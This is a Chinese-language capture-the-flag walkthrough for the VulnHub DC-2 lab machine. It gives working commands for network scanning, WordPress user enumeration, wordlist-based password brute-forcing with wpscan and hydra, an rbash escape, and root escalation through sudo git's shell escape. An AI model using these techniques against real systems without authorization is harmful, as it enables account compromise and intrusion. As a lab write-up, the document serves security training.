靶机入侵——DC2
1、环境搭建
下载地址:https://www.vulnhub.com/entry/dc-2,311/
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里使用主机模式。
2、信息收集
-
主机发现
使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24
192.168.80.129 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24
-
端口扫描
使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.129
-
本地修改host文件解析域名,访问web服务:192.168.31.182 dc-2
windows系统该文件位置:“C:\Windows\System32\drivers\etc\hosts.ics”
linux系统该文件位置:/etc/hosts
修改后,成功访问网站并获得flag1
-
web端进一步信息收集
通过wappalyzer我们发现网站基本信息
3、漏洞探测与利用
-
根据flag1的提示,我们知道可以通过爬取网站内容来生成字典,爆破后台,这里我们使用wpscan来提取用户名,wpscan是专门最对wordpress的扫描器,命令:wpscan --url dc-2 -e u
获得admin、jerry、tom三个用户
-
cewl
是一个网页关键字抓取工具。利用网站关键字作为密码继续进行爆破。命令:cewl dc-2 -w pds.txt
-
使用wpscan爆破:wpscan --url dc-2 -U user.txt -P pds.txt
得到两个用户名及密码:jerry/adipiscing 和 tom/parturient
-
尝试登录后台,默认路径为 wp-admin (如果不是就得尝试爆破)
成功登录,找到flag2
-
根据提示不能从
WordPrss
上面找到捷径,登陆tom也没有发现什么,这是时想到了还有7744端口,因为它是ssh协议所以直接尝试ssh连接。由于端口号不是22,所以需要用-p 7744
指定端口号。 -
使用hydra爆破,使用得到的三个用户名以及生成的密码
hydra -L user.txt -P pds.txt ssh://192.168.80.129:7744 -vV -f -t 4
-
结够发现密码为web后台用户密码,在实际工作中爆破时可以首先尝试相关联账密后空口令。如果能登录将节省大量时间。
-
ssh登录,账密:tom/parturient 或者 jerry/adipiscing
-
执行命令发现受到
rbash
环境的限制,需要绕过rbash
限制。
-
使用以下方式绕过,参考链接https://blog.csdn.net/weixin_43705814/article/details/111879362
BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量` export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出 export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导出
执行命令绕过,并得到flag3
-
根据提示,我们得从jerry账户找flag,移动到其家目录,发现了flag4.txt。
-
根据提示,我们需要想办法进行提权
4、权限提升
-
sudo -l #列出目前用户可执行与无法执行的指令
-
发现tom用户无法使用该命令,切换 jerry 用户:su jerry
-
切换后,我们发现。jerry可以使用root权限的git命,强制进入git交互模式,输入下列命令进行提权
sudo git help config !/bin/bash或者!'sh'完成提权 sudo git -p help !/bin/bash
- 成功提权至root权限,成功找到最后一个flag